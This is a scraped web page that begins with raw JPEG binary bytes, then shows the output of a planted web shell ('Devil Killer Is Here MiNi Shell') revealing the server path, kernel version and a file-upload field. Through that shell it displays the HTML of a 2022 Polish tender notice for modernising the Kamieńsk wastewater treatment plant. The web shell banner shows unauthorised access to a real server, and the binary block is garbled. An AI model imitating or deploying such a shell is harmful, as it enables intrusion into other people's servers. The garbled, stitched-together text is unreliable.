JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220511/0015312301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja oczyszczalni ścieków w Kamieńsku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kamieńsk</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590648280</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wieluńska 50</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kamieńsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-360</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@kamiensk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kamiensk.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja oczyszczalni ścieków w Kamieńsku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8495c834-d0fb-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00153123</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00020758/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Modernizacja oczyszczalni ścieków w Kamieńsku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kamiensk.pl oraz https://bip.kamiensk.com.pl zawierające odesłanie na Platformę przetargową pod adresem:https://kamiensk.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert,<br/>wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym, a wykonawcą, z uwzględnieniem<br/>wyjątków określonych w ustawie odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca<br/>2002r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344) tj. poprzez Platformę przetargową pod adresem:<br/>https://kamiensk.logintrade.net/rejestracja/ustawowe.html<br/>(zwaną dalej zamiennie Platformą przetargową), w wierszu oznaczonym tytułem oraz znakiem niniejszego postępowania.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę, oświadczenia, o których mowa<br/>w art. 125 ust. 1 pzp, pełnomocnictwa sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych opisanych w<br/>załączniku nr 2 do rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla<br/>rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych.<br/>Zamawiający rekomenduje wykorzystanie formatów: .rtf, .pdf, .doc, .docx, .odt., jpg. Ofertę, a także oświadczenia o jakich mowa w<br/>rozdziale 7 SWZ składa się, pod rygorem nieważności, w formie elektronicznej (opatrzonej kwalifikowanym podpisem<br/>elektronicznym) lub w postaci elektronicznej (opatrzonej podpisem zaufanym lub podpisem osobistym) wyłącznie poprzez Platformę<br/>przetargową.<br/>Pozostałe informacje dot. wymagań technicznych i organizacyjnych dot. korespondencji elektronicznej opisano w Rozdziale 8<br/>Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a) administratorem Pani/Pana danych osobowych jest Zamawiający - Gmina Kamieńsk reprezentowana przez Burmistrza<br/>Kamieńska ul. Wieluńska 50, 97-360 Kamieńsk tel. +044 681 71 23 faks +044 681 71 53 www.kamiensk.pl,<br/>www.bip.kamiensk.com.pl<br/>b) kontakt z Inspektorem Ochrony Danych - Tomasz Jafra<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b i c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn. „Modernizacja oczyszczalni ścieków w Kamieńsku” prowadzonym w trybie podstawowym na<br/>podstawie art. 275 pkt. 1) ustawy Prawo Zamówień Publicznych<br/>Pozostałe informacje dot. RODO zawarto w Rozdziale 28 Specyfikacji Warunków Zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIOŚZP.271.1.8.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1572000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja w systemie zaprojektuj i wybuduj zadania pn. „Modernizacja oczyszczalni ścieków<br/>w Kamieńsku” obejmującego w szczególności wykonanie ekspertyz technicznych, opracowanie dokumentacji projektowej<br/>(projekty wykonawcze w zakresie modernizacji oczyszczalni ścieków oraz projekt budowlany i wykonawczy budowy<br/>instalacji fotowoltaicznej), uzyskanie wymaganych opinii, uzgodnień i decyzji (w tym decyzji pozwolenia na budowę), a<br/>następnie wykonanie na ich podstawie następującego zakresu robót:<br/>1) W zakresie instalacji sanitarnych:<br/>a) Dostawa i montaż nowej kraty schodkowej z niezależnym nowym układem odprowadzenia skratek w zamian za<br/>zabudowaną w kanale o szerokości 300 mm kratę ręczną,<br/>b) Wymiana wskazanych zaworów membranowych PIC,<br/>c) Wymiana prowadnic rurowych przy istniejących pompach ścieków surowych podających ścieki na moduł I oczyszczalni<br/>ścieków,<br/>d) Przebudowa rurociągów pompy mamut od osadnika wtórnego do zbiorników technologicznych,<br/>e) Przebudowa istniejącego rurociągu pompy recyrkulacji z przejściami rurociągu do zbiorników technologicznych,<br/>f) Wymiana dyfuzorów i opasek mocujących na rusztach napowietrzania w dwóch komorach napowietrzania modułu I,<br/>czyszczenie zbiorników bez zagospodarowania odpadów (osadów zgromadzonych w komorach napowietrzania),<br/>g) Dostawa i montaż nowej pompy dozującej oraz naprawa istniejącej i przegląd całej instalacji przygotowania i dozowania<br/>polielektrolitu (floulanta) przez autoryzowaną firmę będącą przedstawicielem na Polskę producenta pompy istniejącej,<br/>h) Częściowa likwidacja terenowego stalowego kanału technologicznego, w obszarze kanału terenowego wymiana na nowe<br/>przewodów recyrkulacji ścieków i osadów oraz sprężonego powietrza, zabudowa przewodów w gruncie wraz z<br/>zaizolowaniem, wykonanie nasypu i tras komunikacji pieszej,<br/>i) Dostawa i montaż nowej stacji zlewczej ścieków dowożonych wyposażonej m.in. w przepływomierz oraz sito separacji<br/>zanieczyszczeń stałych,<br/>j) Dostaw i montaż nowych pomp i mieszadła w obiektach technologicznych modułu I oczyszczalni ścieków,<br/>k) Zmiana lokalizacji montażu pompy osadów z komór stabilizacji osadu modułu II oczyszczalni ścieków,<br/>l) Remont instalacji sprężonego powietrza jako napędu zaworów typu PIC,<br/>m) Wymiana izolacji termicznej przewodów technologicznych prowadzonych na wolnym powietrzu.<br/>2) W zakresie branży konstrukcyjno – budowlanej:<br/>a) Remont ogrodzenia terenu oczyszczalni,<br/>b) Remont nawierzchni powierzchni utwardzonych,<br/>c) Remont ogólny budynku socjalno – technicznego,<br/>d) Nadbudowa wysokości ścian zbiorników technologicznych modułu II<br/>3) W zakresie instalacji elektrycznych:<br/>a) Wykonanie instalacji zasilania nowych urządzeń technologicznych w przepompowni ścieków tj. kraty schodkowej,<br/>prasopłuczki, stacji zlewczej ścieków dowożonych,<br/>b) Wymiana lamp oświetleniowych w przepompowni ścieków,<br/>c) Remont instalacji oświetlenia zewnętrznego terenu,<br/>d) Budowa nowej instalacji fotowoltaicznej z magazynem energii (planuje się budowę instalacji o mocy ok 97 kW +/- 2% oraz<br/>magazynu energii o mocy 11 kW/20 kWh, instalacja w układzie off-gird),<br/>e) Dostawa i zainstalowanie agregatu prądotwórczego o mocy min. 88 kVA,<br/>f) Integracja źródeł zasilania z zasilaniem priorytetowym ze źródła własnego,<br/>g) Wymiana sterownika wraz z dodaniem nowych funkcjonalności,<br/>h) Modernizacja systemy SCADA i zakresu wizualizacji.<br/>Szczegółowy opis przedmiotu zamówienia zawarty został w Programie funkcjonalno – użytkowym<br/>Zamawiający informuje, że tam, gdzie w SWZ przedmiot zamówienia został opisany przez wskazanie znaków towarowych,<br/>patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez<br/>konkretnego wykonawcę, dopuszcza rozwiązania równoważne opisywanym pod warunkiem, że będą one spełniały<br/>określone w opisie przedmiotu zamówienia kryteria stosowane w celu oceny równoważności. Tam, gdzie Zamawiający<br/>opisał przedmiot zamówienia przez odniesienie do norm, europejskich ocen technicznych, specyfikacji technicznych i<br/>systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp Zamawiający dopuszcza rozwiązania<br/>równoważne opisywanym, a odniesieniu takiemu towarzyszą słowa „lub równoważne”. Zamawiający wskazuje dla tych<br/>rozwiązań jako kryteria równoważności dopuszczenie tolerancji +/- 5% dla wszelkich wymaganych dla nich parametrów.<br/>Zamawiający wskazuje, że obowiązek zgłoszenia w ofercie rozwiązań równoważnych w stosunku do opisanych w opisie<br/>przedmiotu zamówienia i wykazania równoważności leży po stronie wykonawcy.<br/>W przypadku gdy wymagania w opisie przedmiotu zamówienia odnoszą się do znaku towarowego, patentu lub<br/>pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego<br/>wykonawcę Zamawiający wymaga, aby wykonawca w przypadku zaoferowania rozwiązań równoważnych, przedstawił już w<br/>jego ofercie dowód równoważności potwierdzający spełnienie kryteriów określonych w opisie przedmiotu zamówienia, które<br/>Zamawiający stosuje w celu oceny równoważności (Wyrok TSUE C-14/17 z dnia 2018-07-12) np. karty katalogowe<br/>produktów. W przypadku gdy wymagania w opisie przedmiotu zamówienia odnoszą się do europejskich ocen technicznych,<br/>specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp,<br/>Zamawiający wymaga, aby wykonawca przedstawił już w jego ofercie dowody równoważności w sposób określony w art.<br/>101 ust. 5 i 6 Pzp.<br/>Przed rozpoczęciem robót Wykonawca zobowiązany jest:<br/>• oznakować teren budowy (tablice informacyjne, ostrzegawcze),<br/>• powiadomić właścicieli działek sąsiednich i ewentualne osoby przebywające na działkach sąsiednich o prowadzonych<br/>robotach, Prace uzupełniające wymagane przez Zamawiającego:<br/>1) Wykonanie pełnej obsługi geodezyjnej inwestycji,<br/>2) Wykonanie dokumentacji odbiorowej w dwóch egzemplarzach w języku polskim z podziałem na branże (oprawionej w<br/>segregatory z szczegółowym spisem treści) zawierającej co najmniej:<br/>a) pozwolenie na użytkowanie lub zgłoszenie do użytkowania do PINB przyjęte bez sprzeciwu,<br/>b) oryginał/kserokopię dziennika budowy,<br/>c) mapy geodezyjne powykonawcze z pieczątkami potwierdzającymi wniesienie do zasobu geodezyjnego przez Ośrodek<br/>Dokumentacji Kartograficznej i Geodezyjnej,<br/>d) oryginał pisemnego oświadczenia Kierownika Budowy:<br/>• o wykonaniu robót zgodnie z projektem budowlanym, ostateczną decyzją Pozwolenia na budowę oraz ustawą Prawo<br/>budowlane,<br/>• o doprowadzeniu do należytego stanu i porządku Terenu budowy, a także dróg, ulic, sąsiednich nieruchomości, budynków<br/>i/lub lokali,<br/>• o odpowiednim zagospodarowaniu Terenów przyległych do budowy umożliwiającym właściwą eksploatację<br/>wybudowanego obiektu.<br/>e) zestawienie wbudowanych materiałów wraz z dokumentami potwierdzającymi dopuszczenie ich do stosowania na terenie<br/>Rzeczpospolitej Polskiej,<br/>f) oryginał/kopię projektu budowlanego powykonawczego - podpisanego przez Kierownika Budowy/Kierowników Robót,<br/>g) wykaz zmian istotnych (jeżeli miały miejsce) z załącznikiem graficznym, podpisany przez Kierownika Budowy, Kierownika<br/>Robót odpowiedniego do charakterystyki branży, której dotyczy zmiana, Inspektora Nadzoru, Projektanta, wraz z<br/>dokumentami potwierdzającymi prawidłową legalizację tych zmian,<br/>h) protokoły z badań wykonanych w trakcie realizacji prac budowlanych,<br/>i) wersję elektroniczną (w ilości zgodnej z wersją papierową) dokumentów odbiorowych oraz dokumentacji powykonawczej<br/>(inwentaryzacja w formacie pdf.) na płycie CD/DVD.<br/>Zamawiający określa poniższe wymagania w zakresie zatrudnienia na podstawie stosunku pracy:<br/>- wykaz czynności niezbędnych do realizacji zamówienia, których dotyczą wymagania zatrudnienia na podstawie stosunku<br/>pracy przez wykonawcę lub podwykonawcę osób wykonujących czynności w trakcie realizacji zamówienia - Zamawiający<br/>wymaga by czynności w zakresie wykonania robót branży konstrukcyjno - budowlanej, branży sanitarnej oraz branży<br/>elektrycznej wykonywane były przez osoby zatrudnione przez Wykonawcę, Podwykonawcę na podstawie stosunku pracy w<br/>rozumieniu art. 22 § 1 ustawy z dnia 26 czerwca 1974r. - Kodeks pracy (t.j.: Dz. U. z 2020r. poz. 1320 ze zm.). Osoby<br/>wymienione w zdaniu pierwszym nie mogą wykonywać żadnych czynności na Terenie budowy bez zatrudnienia w ramach<br/>stosunku pracy u Wykonawcy, Podwykonawców robót lub usług. Wymaganie to nie dotyczy kierownika budowy,<br/>kierowników robót, dostawców materiałów na budowę, geodetów, osób wykonujących usługi sprzętowe i transportowe, o ile<br/>czynności te nie stanowią stosunku pracy na gruncie przepisów Kodeksu pracy (np. samozatrudnienie).<br/>- sposób weryfikacji zatrudnienia tych osób oraz uprawnienia zamawiającego w zakresie kontroli spełniania przez<br/>wykonawcę wymagań związanych z zatrudnianiem tych osób oraz sankcji z tytułu niespełnienia tych wymagań określono w<br/>Rozdziale IV SWZ Wzór umowy w sprawie zamówienia publicznego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45315300-1 - Instalacje zasilania elektrycznego</p> <p class="mb-0">45442200-9 - Nakładanie powłok antykorozyjnych</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert - w kryterium „cena oferty” w którym zamawiającemu<br/>zależy, aby wykonawca przedstawił jak najniższą wartość (cenę) zostanie zastosowany następujący wzór:<br/>Liczba Cn<br/>zdobytych ( C ) = ----------- x 100 x waga kryterium 100%<br/>punktów Cb<br/>Gdzie:<br/>Cn – cena najniższa wśród ofert nie odrzuconych<br/>Cb – cena oferty badanej<br/>100 – wskaźnik stały<br/>100 – procentowe znaczenie kryterium ceny<br/>Liczba punktów, którą można uzyskać w ramach kryterium „cena” obliczona zostanie przez podzielenie ceny najniższej z ofert przez<br/>cenę ocenianej oferty i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 100%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Rozdział 6 SWZ Warunki udziału w postępowaniu<br/>6.1.1) Zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia warunków w powyższym zakresie.<br/>6.1.2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej o ile wynika to z odrębnych<br/>przepisów<br/>Zamawiający nie stawia warunków w powyższym zakresie.<br/>6.1.3) Sytuacji ekonomicznej lub finansowej<br/>Zamawiający stawia szczegółowe wymagania w zakresie oceny tych zdolności tj. o udzielenie zamówienia może ubiegać się<br/>wykonawca, który wykaże minimalne poziomy zdolności w zakresie sytuacji ekonomicznej lub finansowej tj. który wykaże, iż<br/>posiada środki finansowe lub zdolność kredytową w kwocie nie mniejszej niż 1.800.000,00 zł (słownie: jeden milion<br/>osiemset<br/>tysięcy złotych 00/100).<br/>Wykonawca potwierdza spełnianie warunku w pierwszej kolejności poprzez złożenie wraz z ofertą Oświadczenia własnego,<br/>o którym mowa w pkt. 7.1 SWZ.<br/>6.1.4) Zdolności technicznej lub zawodowej<br/>Zamawiający stawia szczegółowe wymagania w zakresie oceny tych zdolności tj. o udzielenie zamówienia może ubiegać się<br/>wykonawca, który wykaże minimalne poziomy zdolności w zakresie osób, które zostaną skierowane przez wykonawcę do<br/>realizacji zamówienia tj. który wykaże, iż:<br/>a) dysponuje osobą, która pełnić będzie funkcję projektanta branży sanitarnej posiadającą uprawnienia do projektowania w<br/>specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń określone przepisami ustawy Prawo<br/>budowlane,<br/>b) dysponuje osobą, która pełnić będzie funkcję projektanta branży elektrycznej posiadającą uprawnienia do projektowania<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń<br/>określone przepisami ustawy Prawo budowlane,<br/>c) dysponuje osobą, która pełnić będzie funkcję projektanta branży konstrukcyjno - budowlanej posiadającą uprawnienia do<br/>projektowania w specjalności konstrukcyjno - budowlanej bez ograniczeń określone przepisami ustawy Prawo budowlane,<br/>d) dysponuje osobą, która pełnić będzie funkcję kierownika budowy posiadającą uprawnienia do kierowania robotami<br/>budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych, wodociągowych i<br/>kanalizacyjnych bez ograniczeń określone przepisami ustawy Prawo budowlane,<br/>e) dysponują osobą która pełnić będzie funkcję kierownika robót branży instalacyjnej elektrycznej posiadającą 